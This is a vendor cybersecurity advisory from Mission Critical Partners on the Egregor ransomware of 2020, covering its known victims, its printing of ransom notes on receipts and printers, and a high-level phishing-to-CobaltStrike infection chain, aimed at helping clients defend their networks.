As part of our effort to inform our clients about potential and serious cybersecurity issues, MCP provides advisories about vulnerabilities and exploits that could threaten the operations of their critical communications networks. Sign up to receive these advisories in your inbox as soon as they are released.
This week, there is a new critical alert that requires the mission-critical community’s immediate attention.
Advisory Overview
The ransomware-as-a-service variant “Egregor” is spiking across the cybersecurity and information technology (IT) landscape after the shutdown of the notorious Maze ransomware campaign. Some major organizations have fallen victim to the malware, including Kmart, Cencosud (a retail giant in South America), Randstad NV (the world’s largest staffing company and owner of Monster.com), and Translink (Vancouver’s bus and rail transportation system).
The ransomware has been seen hijacking printers and repeatedly printing the ransom note. In the case of retail organizations, the ransom note has been printing on consumers’ receipts at checkout. Mission Critical Partners recommends deploying advanced endpoint protection to block ransomware pre-execution.
Technical Detail and Additional InformationWhat is the threat?
A new ransomware malware that appeared in September 2020 has taken largescale public sector and private sector organizations hostage. The Egregor ransomware recently infected numerous companies within the last month and is demanding payment for the compromised data. Sources have confirmed that many threat actors have moved to Egregor as their malware of choice since the Maze ransomware operation shut down, and attacks have been on a steady rise.
Why is this noteworthy?
The Egregor ransomware was first seen in September 2020, and since the initial sighting, the malware has been confirmed to have successfully impacted several well-known entities. Aside from the surge of infections, the Egregor ransomware variant takes a slightly more devious approach than other types of ransomware. In addition to stealing files, launching an encryption operation, and extorting the victim, the malware can flex its virtual muscles by “print bombing” the ransom note through attached printers, providing further evidence that the systems are breached.
What is the exposure?
An agency’s exposure to a ransomware attack varies greatly based on numerous variables; however, the overwhelming majority of ransomware attacks are initiated via phishing emails that contain a malicious payload, typically in the form of Word, Excel, Google, or DocuSign documents. Continuously training employees regarding how to recognize and report suspicious activities is key to protecting the company from a cyberattack. Once the malicious attachment has been opened, a commodity malware tool, such as Qbot, Ursnif, or IcedID, is downloaded along with CobaltStrike, a popular reconnaissance and lateral movement tool. After CobaltStrike is deployed, the threat actor can gain full access to the network within minutes.
What are the recommendations?
The current recommendations to mitigate the impact of a potential ransomware attack are as follows:
For more in-depth information about the recommendations, please visit the following links:
Mike Beagles has specialized experience with supporting mission critical communications agencies by providing technical expertise, strategic IT planning, and architecting both on-prem and shared systems for new and innovative technologies as well as legacy solutions. He currently manages the platform and suite of tools used to deliver MCP network and cybersecurity monitoring to our clientele.